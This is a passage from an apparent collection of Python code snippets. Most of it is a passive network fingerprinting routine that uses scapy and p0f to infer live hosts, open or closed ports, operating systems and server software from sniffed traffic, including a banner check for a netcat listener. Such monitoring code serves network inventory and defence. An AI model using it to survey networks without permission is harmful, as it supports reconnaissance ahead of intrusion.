self.packets.pop(0)\n self.packets_expired += 1\n self.packets.append((nxp_sniffer, rawmsg))\n self.packets_cv.notify_all()\n self.packets_total += 1\n else:\n self.packets_handled += 1\n self.logger.debug(\"Message handled by callback\")", "def _processPacket(self, packet):\n packet_type = (packet[0] & 0xF0) >> 4\n packet_flags = (packet[0] & 0x0F)\n\n if packet_type == CONNECT:\n self._handleConnect(packet)\n elif packet_type == CONNACK:\n self._handleConnack(packet)\n elif packet_type == PUBLISH:\n self._handlePublish(packet)\n elif packet_type == PUBACK:\n self._handlePuback(packet)\n elif packet_type == PUBREC:\n self._handlePubrec(packet)\n elif packet_type == PUBREL:\n self._handlePubrel(packet)\n elif packet_type == PUBCOMP:\n self._handlePubcomp(packet)\n elif packet_type == SUBSCRIBE:\n self._handleSubscribe(packet)\n elif packet_type == SUBACK:\n self._handleSuback(packet)\n elif packet_type == UNSUBSCRIBE:\n self._handleUnsubscribe(packet)\n elif packet_type == UNSUBACK:\n self._handleUnsuback(packet)\n elif packet_type == PINGREQ:\n self._handlePingreq(packet)\n elif packet_type == PINGRESP:\n self._handlePingresp(packet)\n elif packet_type == DISCONNECT:\n self._handleDisconnect(packet)\n else:\n print(\"ERROR: Invalid Packet Type: %s -- Aborting Connection\" %(packet_type))\n self.transport.abortConnection()", "def processmessage(self,pktMessage):\n raise NotImplementedError()", "def handle_packet(self, packet):\n if self.compression:\n compression_len, packet = ParseVarInt(packet, consume=True)\n\n # if we have compressed data decompress it\n if compression_len != 0:\n packet = zlib.decompress(bytearray(packet))\n\n packet_id, packet = ParseVarInt(packet, consume=True)\n try:\n packet_id = str(self.state(packet_id))\n except ValueError:\n # print(\"Unknown packet ID %s for state %s\" % (hex(packet_id), self.state))\n pass\n\n try:\n func = getattr(self, \"handle_\" + packet_id.split(\".\")[1])\n packet = func(packet=packet)\n assert len(packet) == 0\n except AttributeError:\n # print(\"Unknown packet: %s\" % packet)\n pass", "def process_udp_packet(self, packet_data, packet_source):\n # Add your logic here, after your logic is done,\n # add the packet to be sent to self.packet_buffer\n # feel free to remove this line\n print(f\"Received a packet from {packet_source}\")\n in_packet = self._parse_udp_packet(packet_data)\n out_packet = self._do_some_logic(in_packet)\n\n # This shouldn't change.\n self.packet_buffer.append(out_packet)\n\n return in_packet", "def processpacket(p):\n\n\tglobal SynSentToTCPService\n\tglobal SynAckSentToTCPClient\n\tglobal LiveTCPService\n\tglobal LiveTCPClient\n\tglobal LiveUDPService\n\tglobal LiveUDPClient\n\tglobal NmapServerDescription\n\tglobal ManualServerDescription\n\tglobal ClientDescription\n\tglobal MacAddr\n\tglobal OSDescription\n\tglobal ServiceFPs\n\tglobal SipPhoneMatch\n\tglobal Devel\n\tglobal IsRouter\n\tglobal DNSRecord\n\tglobal HostIPs\n\n\tif (type(p) == Dot3) and (type(p['LLC']) == LLC):\n\t\tUnhandledPacket(p)\n\t\t#Spanning Tree Protocol\n\t\t#Debug(\"802.3\")\n\t\t#p.show()\n\t\t#print type(p['LLC'])\n\telif (p['Ethernet'] == None):\n\t\tDebug(\"non-ethernet packet\")\t\t#Need more details on how to handle.\n\t\tUnhandledPacket(p)\n\t\t#p.show()\n\t\t#print type(p)\n\t\t#quit()\n\telif p['Ethernet'].type == 0x0806:\t\t#ARP\n\t\t#pull arp data from here instead of tcp/udp packets, as these are all local\n\t\tif (p['ARP'].op == 1):\t\t\t#1 is request (\"who-has\")\n\t\t\tpass\n\t\tif (p['ARP'].op == 2):\t\t\t#2 is reply (\"is-at\")\n\t\t\tif (p['ARP.psrc'] != None) and (p['ARP.hwsrc'] != None):\n\t\t\t\tIPAddr=p['ARP.psrc']\n\t\t\t\tMyMac=p['ARP.hwsrc'].upper()\n\t\t\t\tif (not MacAddr.has_key(IPAddr)) or (MacAddr[IPAddr] != MyMac):\n\t\t\t\t\tReportId(\"MA\", IPAddr, 'Ethernet', MyMac, '')\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telse:\n\t\t\tUnhandledPacket(p)\n\telif p['Ethernet'].type == 0x0800:\t\t#IP\n\t\tsIP=str(p['IP'].src)\n\t\tdIP=str(p['IP'].dst)\n\t\t#Best to get these from arps instead; if we get them from here, we get router macs for foreign addresses.\n\t\t#if not MacAddr.has_key(sIP):\n\t\t#\tReportId(\"MA\", sIP, \"Ethernet\", p['Ethernet'].src, '')\n\t\t#if not MacAddr.has_key(dIP):\n\t\t#\tReportId(\"MA\", dIP, \"Ethernet\", p['Ethernet'].dst, '')\n\n\t\tif p['IP'].proto == 1:\t\t\t#ICMP\n\t\t\tType = p['ICMP'].type\n\t\t\tCode = p['ICMP'].code\n\n\t\t\tif (Type == 0):\t\t\t\t\t\t#Echo reply\n\t\t\t\tif (not(OSDescription.has_key(sIP))):\n\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", 'icmp echo reply')\n\t\t\telif (Type == 3) and (type(p[IPerror]) == IPerror):\t#Unreachable, check that we have an actual embedded packet\n\t\t\t\t#if (type(p[IPerror]) != IPerror):\n\t\t\t\t#\tp.show()\n\t\t\t\t#\tprint type(p[IPerror])\n\t\t\t\t#\tquit()\n\t\t\t\tOrigdIP = p[IPerror].dst\n\t\t\t\tif (Code == 0):\t\t\t\t\t#Net unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"NetUn\", \"router\", \"\")\n\t\t\t\telif (Code == 1):\t\t\t\t#Host unreachable\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unreachable')\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"HostUn\", \"router\", \"\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 17):\t#Port unreachable and embedded protocol = 17, UDP, as it should be\n\t\t\t\t\tDNSServerLoc = p[IPerror].src + \",UDP_53\"\n\t\t\t\t\tif (p[UDPerror].sport == 53) and (ManualServerDescription.has_key(DNSServerLoc)) and (ManualServerDescription[DNSServerLoc] == \"dns/server\"):\n\t\t\t\t\t\t#If orig packet coming from 53 and coming from a dns server, don't do anything (closed port on client is a common effect)\n\t\t\t\t\t\t#Don't waste time on port unreachables going back to a dns server; too common, and ephemeral anyways.\n\t\t\t\t\t\tpass\n\t\t\t\t\telse:\n\t\t\t\t\t\t#If orig packet coming from something other than 53, or coming from 53 and NOT coming from a dns server, log as closed\n\t\t\t\t\t\tOrigDPort = str(p[UDPerror].dport)\n\t\t\t\t\t\tOrigDstService = OrigdIP + \",UDP_\" + OrigDPort\n\t\t\t\t\t\tif ((not LiveUDPService.has_key(OrigDstService)) or (LiveUDPService[OrigDstService] == True)):\n\t\t\t\t\t\t\tLiveUDPService[OrigDstService] = False\n\t\t\t\t\t\t\tReportId(\"US\", OrigdIP, \"UDP_\" + OrigDPort, \"closed\", \"port unreachable\")\n\t\t\t\telif (Code == 3) and (p[IPerror].proto == 6) and (p[TCPerror].dport == 113):\t#Port unreachable and embedded protocol = 6, TCP, which it shouldn't. May be the same firewall providing the TCP FR's\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 6):\t\t\t\t#Net unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'net unknown')\n\t\t\t\telif (Code == 7):\t\t\t\t#Host unknown\n\t\t\t\t\tif (not(OSDescription.has_key(OrigdIP))):\n\t\t\t\t\t\tReportId(\"IP\", OrigdIP, \"IP\", \"dead\", 'host unknown')\n\t\t\t\telif (Code == 9):\t\t\t\t#Network Administratively Prohibited\n\t\t\t\t\tpass\t\t\t\t\t#Can't tell much from this type of traffic. Possibly list as firewall?\n\t\t\t\telif (Code == 10):\t\t\t\t#Host Administratively Prohibited\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 11):\t\t\t\t#Network unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 12):\t\t\t\t#Host unreachable for TOS\n\t\t\t\t\tpass\n\t\t\t\telif (Code == 13):\t\t\t\t#Communication Administratively prohibited\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telif (Type == 8):\t\t\t\t\t#ping\n\t\t\t\t#FIXME - check payload for ping sender type, perhaps\n\t\t\t\tpass\n\t\t\telif (Type == 11):\t\t\t\t\t#Time exceeded\n\t\t\t\tif (Code == 0):\t\t\t\t\t#TTL exceeded\n\t\t\t\t\tif (not(IsRouter.has_key(sIP))):\n\t\t\t\t\t\t#FIXME - put original target IP as column 5?\n\t\t\t\t\t\tReportId(\"RO\", sIP, \"TTLEx\", \"router\", \"\")\n\t\t\t\telse:\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\telse:\n\t\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 2:\t\t#IGMP\n\t\t\tUnhandledPacket(p)\n\t\telif p['IP'].proto == 6:\t\t#TCP\n\t\t\tsport=str(p['TCP'].sport)\n\t\t\tdport=str(p['TCP'].dport)\n\t\t\t#print p['IP'].src + \":\" + sport + \" -> \", p['IP'].dst + \":\" + dport,\n\t\t\tif (p['TCP'].flags & 0x17) == 0x12:\t#SYN/ACK (RST and FIN off)\n\t\t\t\tCliService = dIP + \",TCP_\" + sport\n\t\t\t\tif not SynAckSentToTCPClient.has_key(CliService):\n\t\t\t\t\tSynAckSentToTCPClient[CliService] = True\n\n\t\t\t\t#If we've seen a syn sent to this port and have either not seen any SA/R, or we've seen a R in the past:\n\t\t\t\t#The last test is for a service that was previously closed and is now open; report each transition once.\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == False)) ):\n\t\t\t\t\tLiveTCPService[Service] = True\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", '')\n\t\t\telif (p['TCP'].flags & 0x17) == 0x02:\t#SYN (ACK, RST, and FIN off)\n\t\t\t\tService = dIP + \",TCP_\" + dport\n\t\t\t\tif not SynSentToTCPService.has_key(Service):\n\t\t\t\t\tSynSentToTCPService[Service] = True\n\t\t\t\t#Debug(\"trying to fingerprint \" + sIP)\n\t\t\t\ttry:\n\t\t\t\t\tp0fdata = p0f(p)\n\t\t\t\t\t#FIXME - reasonably common occurence, don't whine, just fix it.\n\t\t\t\t\t#if (len(p0fdata) >1):\n\t\t\t\t\t#\tDebug(\"More than one OS fingerprint for \" + sIP + \", using the first.\")\n\t\t\t\t\tif (len(p0fdata) >=1):\n\t\t\t\t\t\tPDescription = p0fdata[0][0] + \" \" + p0fdata[0][1] + \" (\" + str(int(p0fdata[0][2]) + 1)\t#FIXME - Grabbing just the first candidate, may need to compare correlation values; provided?\n\t\t\t\t\t\tif (p0fdata[0][2] == 0):\n\t\t\t\t\t\t\tPDescription = PDescription + \" hop away)\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tPDescription = PDescription + \" hops away)\"\n\t\t\t\t\t\t\t\t\t\t\t\t\t#[N][2] param appears to be distance away in hops (but add 1 to this to get real hop count?)\n\t\t\t\t\t\tPDescription = PDescription.replace(',', ';')\t\t#Commas are delimiters in output\n\t\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\t\texcept:\n\t\t\t\t\tPDescription = 'p0f failure'\n\t\t\t\t\tif (not(OSDescription.has_key(sIP))) or (OSDescription[sIP] != PDescription):\n\t\t\t\t\t\tDebug(\"P0f failure in \" + sIP + \":\" + sport + \" -> \" + dIP + \":\" + dport)\n\t\t\t\t\t\tOSDescription[sIP] = PDescription\n\t\t\t\t\t\tReportId(\"IP\", sIP, \"IP\", \"live\", PDescription)\n\t\t\telif (p['TCP'].flags & 0x07) == 0x01:\t#FIN (SYN/RST off)\n\t\t\t\tCliService = sIP + \",TCP_\" + dport\n\t\t\t\tif ( (SynAckSentToTCPClient.has_key(CliService)) and ((not LiveTCPClient.has_key(CliService)) or (LiveTCPClient[CliService] == False)) ):\n\t\t\t\t\tLiveTCPClient[CliService] = True\n\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", '')\n\t\t\telif (p['TCP'].flags & 0x07) == 0x04:\t#RST (SYN and FIN off)\n\t\t\t\t#FIXME - handle rst going in the other direction?\n\t\t\t\tService = sIP + \",TCP_\" + sport\n\t\t\t\tif ( (SynSentToTCPService.has_key(Service)) and ((not LiveTCPService.has_key(Service)) or (LiveTCPService[Service] == True)) ):\n\t\t\t\t\tLiveTCPService[Service] = False\n\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"closed\", '')\n\t\t\telif ((p['TCP'].flags & 0x3F) == 0x15) and (sport == \"113\"):\t#FIN, RST, ACK (SYN, PSH, URG off)\n\t\t\t\t#This may be a firewall or some other device stepping in for 113 with a FIN/RST.\n\t\t\t\tpass\n\t\t\telif (p['TCP'].flags & 0x17) == 0x10:\t#ACK (RST, SYN, and FIN off)\n\t\t\t\t#FIXME - check for UnhandledPacket placement in ACK\n\t\t\t\tFromPort = sIP + \",TCP_\" + sport\n\t\t\t\tToPort = dIP + \",TCP_\" + dport\n\t\t\t\tPayload = str(p['Raw.load'])\t\t\t#For some reason this doesn't handle p['Raw'].load\n\t\t\t\tif ( (LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True) and (LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\n\t\t\t\t\tprint \"Logic failure: both \" + FromPort + \" and \" + ToPort + \" are listed as live services.\"\n\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\telif ((LiveTCPService.has_key(FromPort)) and (LiveTCPService[FromPort] == True)):\t#If the \"From\" side is a known TCP server:\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort) ):\t\t#Check nmap fingerprint strings for this server port\n\t\t\t\t\t\tif (ServiceFPs.has_key(int(sport))):\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs[int(sport)]:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\t#Debugging:\n\t\t\t\t\t\t\t\t\t#FIXME - removeme once understood:\n\t\t\t\t\t\t\t\t\t#File \"/home/wstearns/med/programming/python/passer/passer.py\", line 504, in processpacket\n\t\t\t\t\t\t\t\t\t#OutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\t#TypeError: expected a character buffer object\n\t\t\t\t\t\t\t\t\tif (OneTuple[1] == None):\n\t\t\t\t\t\t\t\t\t\tDebug(\"Null description for \" + OneTuple[0])\n\t\t\t\t\t\t\t\t\t\t#quit()\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\t#Example: Replace \"$1\" with MatchObj.group(1)\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), str(MatchObj.group(Index)))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\t\t\t\t\t#Exit for loop, no need to check any more fingerprints now that we've found a match\n\n\t\t\t\t\tif (not NmapServerDescription.has_key(FromPort)):\t\t#If the above loop didn't find a server description\n\t\t\t\t\t\tif (ServiceFPs.has_key('all')):\t\t\t\t#Now recheck against regexes not associated with a specific port (port 'all').\n\t\t\t\t\t\t\tfor OneTuple in ServiceFPs['all']:\n\t\t\t\t\t\t\t\tMatchObj = OneTuple[0].search(Payload)\n\t\t\t\t\t\t\t\tif (MatchObj != None):\n\t\t\t\t\t\t\t\t\tOutputDescription = OneTuple[1]\n\t\t\t\t\t\t\t\t\tif len(MatchObj.groups()) >= 1:\n\t\t\t\t\t\t\t\t\t\t#We have subexpressions matched, these need to be inserted into the description string\n\t\t\t\t\t\t\t\t\t\tfor Index in range(1,len(MatchObj.groups())+1):\n\t\t\t\t\t\t\t\t\t\t\tOutputDescription = OutputDescription.replace('$' + str(Index), MatchObj.group(Index))\n\t\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", OutputDescription)\n\t\t\t\t\t\t\t\t\tNmapServerDescription[sIP + \",TCP_\" + sport] = OutputDescription\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif (not ManualServerDescription.has_key(FromPort) ):\n\t\t\t\t\t\tif (sport == \"22\") and (Payload != None) and (Payload.find('SSH-') > -1):\n\t\t\t\t\t\t\tif ( (Payload.find('SSH-1.99-OpenSSH_') > -1) or (Payload.find('SSH-2.0-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/openssh\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/openssh\"\n\t\t\t\t\t\t\telif (Payload.find('SSH-1.5-') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"ssh/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"ssh/generic\"\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' ESMTP Sendmail ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/sendmail\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/sendmail\"\n\t\t\t\t\t\telif (sport == \"25\") and (Payload != None) and (Payload.find(' - Welcome to our SMTP server ESMTP') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"smtp/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"smtp/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t#Check for port 80 and search for \"Server: \" once\n\t\t\t\t\t\telif (sport == \"80\") and (Payload != None) and (Payload.find('Server: ') > -1):\n\t\t\t\t\t\t\tif (Payload.find('Server: Apache') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/apache\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/apache\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Embedded HTTP Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/embedded\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/embedded\"\n\t\t\t\t\t\t\telif (Payload.find('Server: gws') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/gws\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/gws\"\n\t\t\t\t\t\t\telif (Payload.find('Server: KFWebServer') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/kfwebserver\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/kfwebserver\"\n\t\t\t\t\t\t\telif (Payload.find('Server: micro_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/micro-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/micro-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Microsoft-IIS') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/iis\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/iis\"\n\t\t\t\t\t\t\telif (Payload.find('Server: lighttpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/lighttpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/lighttpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: MIIxpc') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mirrorimage\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mirrorimage\"\n\t\t\t\t\t\t\telif (Payload.find('Server: mini_httpd') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/mini-httpd\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/mini-httpd\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nc -l -p 80') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nc\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nc\"\n\t\t\t\t\t\t\telif (Payload.find('Server: nginx/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nginx\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nginx\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Nucleus') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/nucleus\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/nucleus\"\n\t\t\t\t\t\t\telif (Payload.find('Server: RomPager') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/rompager\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/rompager\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Server') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/server\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/server\"\n\t\t\t\t\t\t\telif (Payload.find('Server: Sun-ONE-Web-Server/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/sun-one\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/sun-one\"\n\t\t\t\t\t\t\telif (Payload.find('Server: TrustRank Frontend') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/trustrank\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/trustrank\"\n\t\t\t\t\t\t\telif (Payload.find('Server: YTS/') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/yahoo\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/yahoo\"\n\t\t\t\t\t\t\telif (Payload.find('HTTP/1.0 404 Not Found') > -1) or (Payload.find('HTTP/1.1 200 OK') > -1):\n\t\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"http/generic\")\n\t\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"http/generic\"\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"110\") and (Payload != None) and (Payload.find('POP3 Server Ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"pop3/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"pop3/generic\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find('* OK dovecot ready') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/dovecot\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/dovecot\"\n\t\t\t\t\t\telif (sport == \"143\") and (Payload != None) and (Payload.find(' IMAP4rev1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"imap/generic\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"imap/generic\"\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\t\t\telif (sport == \"783\") and (Payload != None) and (Payload.find('SPAMD/1.1 ') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"spamd/spamd\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"spamd/spamd\"\n\t\t\t\t\t\telif ( (sport == \"3128\") or (sport == \"80\") ) and (Payload != None) and (Payload.find('Via: ') > -1) and (Payload.find(' (squid/') > -1):\n\t\t\t\t\t\t\tReportId(\"TS\", sIP, \"TCP_\" + sport, \"listening\", \"proxy/squid\")\n\t\t\t\t\t\t\tManualServerDescription[sIP + \",TCP_\" + sport] = \"proxy/squid\"\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tUnhandledPacket(p)\n\t\t\t\t\t\t\t#LogNewPayload(ServerPayloadDir, FromPort, Payload)\n\t\t\t\telif ((LiveTCPService.has_key(ToPort)) and (LiveTCPService[ToPort] == True)):\t\t#If the \"To\" side is a known TCP server:\n\t\t\t\t\tClientKey = sIP + \",TCP_\" + dport\t#Note: CLIENT ip and SERVER port\n\t\t\t\t\tif (not ClientDescription.has_key(ClientKey)):\n\t\t\t\t\t\tif (dport == \"22\") and (Payload != None) and ( (Payload.find('SSH-2.0-OpenSSH_') > -1) or (Payload.find('SSH-1.5-OpenSSH_') > -1) ):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"ssh/openssh\")\n\t\t\t\t\t\t#As cute as it is to catch this, it miscatches any relay that's carrying a pine-generated mail.\n\t\t\t\t\t\t#elif (dport == \"25\") and (Payload != None) and (Payload.find('Message-ID: <Pine.') > -1):\n\t\t\t\t\t\t#\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"smtp/pine\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: libwww-perl/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/libwww-perl\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Lynx') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/lynx\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Mozilla') > -1) and (Payload.find(' Firefox/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/firefox\")\n\t\t\t\t\t\telif ( (dport == \"80\") or (dport == \"3128\") ) and (Payload != None) and (Payload.find('User-Agent: Wget/') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"http/wget\")\n\t\t\t\t\t\telif (dport == \"143\") and (Payload != None) and (Payload.find('A0001 CAPABILITY') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", \"imap/generic\")\n\t\t\t\t\t\t\t#LogNewPayload(ClientPayloadDir, ClientKey, Payload)\n\t\t\t\t\t\telif (dport == \"783\") and (Payload != None) and (Payload.find('PROCESS SPAMC') > -1):\n\t\t\t\t\t\t\tReportId(\"TC\", sIP, \"TCP_\" + dport, \"open\", 